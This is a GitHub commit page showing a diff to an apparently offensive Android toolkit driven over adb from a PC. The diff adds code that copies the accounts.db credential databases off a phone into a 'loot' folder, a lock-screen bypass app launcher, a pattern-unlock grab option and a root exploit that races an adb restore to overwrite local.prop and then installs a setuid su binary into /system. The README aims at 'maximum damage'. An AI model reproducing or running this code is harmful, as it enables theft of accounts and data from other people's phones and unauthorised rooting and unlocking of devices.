Permalink
Browse files

Fixed issue #2 by Hackrylix. Now gets JB user's accounts.db

  • Loading branch information...
1 parent 7d3f2de commit 546398ba327394fd9a21f3ef30f61f73986a10cc @kosborn committed Sep 29, 2012
Showing with 60 additions and 24 deletions.
  1. +3 −3 README.md
  2. +8 −11 functions.sh
  3. +1 −1 getSensitive.sh
  4. +1 −1 installAnti.sh
  5. +11 −7 root4.x.sh
  6. +10 −0 run.sh
  7. +26 −1 testDynLoad.sh
View
@@ -36,6 +36,7 @@ Android requires:
* **Busybox**
* A terminal emulator
* Probably a [USB On the Go cable](http://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Daps&field-keywords=usb+otg)
+ * **Check out Hak5's micro-micro USB cable: [Hak5 Shop](http://hakshop.myshopify.com/products/micro-to-micro-otg)
PC requires
* Android SDK (specifically, you nee adb)
@@ -53,11 +54,10 @@ Running
Targets known to be working:
* AOKP Milestone 5
* CyanogenMod
- * Busybox 1.20.0
- * Probably others, all they really need at the moent is busybox
Targets that still have some issues:
* Stock Android (Still figuring out the best methods to re-implement everything with a limited shell environment)
+ * **Note! Stock Android is now working, busybox is now PUSHED to the device**
As necessary, I'll start expanding and building checks against certain ROMs/toolkit versions to create maximum damage.
@@ -91,4 +91,4 @@ Me, you're welcome. [@theKos](https://twitter.com/#!/thekos)
License
-------
-GPLv2
+GPLv3
View
@@ -48,11 +48,6 @@ else
exit
fi
-# Let's just push busybox, because screw making stock roms compatible
-# (This will bite me in the ass when we get any non-ARM6/7 arch. proc.)
-ourBBPath=/data/local/tmp/busybox
-adb push includes/busybox-static $ourBBPath
-
# ADB wrapper to easy root pain...
command(){
echo "$*" > $TMP/p2p-tmp
@@ -118,7 +113,7 @@ isRoot(){
# Check the size of a directory or more
dataSize(){
- command "du -hc $*" | tail -n1
+ command "/data/local/tmp/busybox du -hc $*" | tail -n1
}
@@ -140,8 +135,10 @@ getData(){
# Actually get the file
getDataProto(){
FILENAME=jacked_$(date +%s).tar
- command "tar -cf - $* 2>/dev/null | ${ourBBPath} base64 " | tr -d "\r" | base64 -d > $FILENAME
- echo "The file has been saved as $FILENAME"
+ SAUCEDIR=loot/
+ mkdir $SAUCEDIR 2>/dev/null
+ command "/data/local/tmp/busybox tar -cf - $* 2>/dev/null | /data/local/tmp/busybox base64 " | tr -d "\r" | base64 -d > ${SAUCEDIR}/$FILENAME
+ echo "The file has been saved as ${SAUCEDIR}/${FILENAME}"
}
@@ -173,16 +170,16 @@ getSearch(){
# Actually get the file
getSearchProto(){
FILENAME=jacked_$(date +%s).tar
- command "${ourBBPath} find $1 -iname '$2' -type f -size $3 -exec tar -cf - {} \; 2>/dev/null | base64 " | tr -d "\r" | base64 -d > $FILENAME
+ command "/data/local/tmp/busybox find $1 -iname '$2' -type f -size $3 -exec tar -cf - {} \; 2>/dev/null | base64 " | tr -d "\r" | base64 -d > $FILENAME
echo "The file has been saved as $FILENAME"
}
search(){
- command "${ourBBPath} find $1 -iname '$2' -type f -size $3 -exec ls {} \;"
+ command "/data/local/tmp/busybox find $1 -iname '$2' -type f -size $3 -exec ls {} \;"
}
size(){
- command "${ourBBPath} find $1 -iname \"$2\" -type f -size $3 -print0 | xargs -0 du -ch|tail -n1"
+ command "/data/local/tmp/busybox find $1 -iname \"$2\" -type f -size $3 -print0 | /data/local/tmp/busybox xargs -0 /data/local/tmp/busybox du -ch|tail -n1"
}
View
@@ -7,7 +7,7 @@
echo $ISROOT
if [ $ISROOT -le 1 ]; then
- DATAPATH="/data/system/accounts.db"
+ DATAPATH="/data/system/accounts.db /data/system/users/0/accounts.db"
echo 'We are root...'
getData "$DATAPATH"
else
View
@@ -12,5 +12,5 @@ if [ $isInstalled -eq 0 ]; then
adb uninstall io.kos.antiguard
else
adb install ./AntiGuard/AntiGuard.apk
- adb shell am start -S io.kos.antiguard/.unlock
+ adb shell am start io.kos.antiguard/.unlock
fi
View
@@ -12,13 +12,17 @@ adb restore modules/extras/fakebackup.ab
command "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99 2>/dev/null; do :; done; echo 'Overwrote local.prop!';"
-if command "cat /data/local.prop" |grep ro.kernel.qemu=1 > /dev/null
+if command "cat /data/local.prop"
then echo "Succesfully rooted!"
echo "Requires a reboot..."
- echo "Would you like to reboot? (y/N)"
- read reboot
- case "$reboot" in
- y|Y) adb reboot ;;
- *) echo "" ;;
- esac
+ adb reboot
+ sleep 2
+ adb wait-for-device
+ command "mount -o rw,remount /system"
+ adb push includes/su-static /system/xbin/su
+ command "/data/local/tmp/busybox chown 0:0 /system/xbin/su"
+ command "/data/local/tmp/busybox chmod 6777 /system/xbin/su"
+ adb push includes/Superuser.apk /system/app/
+ command "rm /data/local.prop"
+ adb reboot
fi
View
10 run.sh
@@ -30,6 +30,7 @@ prompt(){
adb wait-for-device
+
fi
# check if we're root!
@@ -38,6 +39,13 @@ prompt(){
if [ $RUNONCE = 0 ]
then
+ # Let's just push busybox, because screw making stock roms compatible
+ # (This will bite me in the ass when we get any non-ARM6/7 arch. proc.)
+ ourBBPath=/data/local/tmp/busybox
+ adb push includes/busybox-static $ourBBPath
+ adb shell "chmod 777 /data/local/tmp/busybox"
+ echo "Trying to push busybox..."
+
ISROOT=$(isRoot noinfo)
if [ "$ISROOT" = "1" ]
then
@@ -55,6 +63,7 @@ prompt(){
5) Steal Accounts
6) Install/Uninstall AntiGuard
7) Root 4.x using adb race condition
+ 8) Get pattern unlock!
x) Exit
"
echo -n "Choose wisely: "
@@ -69,6 +78,7 @@ prompt(){
5) echo "The good stuff.." && . ./getSensitive.sh ;;
6) echo "Unlocking Screen" && . ./installAnti.sh ;;
7) echo "Trying to root..." && . ./root4.x.sh ;;
+ 8) echo "Getting gesture..." && . ./getGesture.sh ;;
'x'|'X') echo "Goodbye." && exit ;;
*) echo "${bold}That's not an answer!${none}\n" && prompt ;;
esac
View
@@ -33,5 +33,30 @@ done
echo "Select a command:"
read userCommand
+ deviceConnected=isConnected
+ if [ "$(isConnected)" = 'NO' ]; then eval $(echo '$COMMAND'$userCommand)
+ echo "Waiting for phone to connect..."
+ # probably a better way to do this... but I don't care!!
+ #while [ "$(isConnected)" = 'NO' ]; do
+ # sleep .1
+ #done
-eval $(echo '$COMMAND'$userCommand)
+ # Found it! Hopefully this won't cause issues
+ adb wait-for-device
+
+
+ fi
+
+ # check if we're root!
+ # Note: This is here because sh's variable scopig doesn't go UP apparently...
+
+
+ if [ $RUNONCE = 0 ]
+ then
+ ISROOT=$(isRoot noinfo)
+ if [ "$ISROOT" = "1" ]
+ then
+ echo 'WE ARE THE ROOT!'
+ RUNONCE=1
+ fi
+ fi

0 comments on commit 546398b

Please sign in to comment.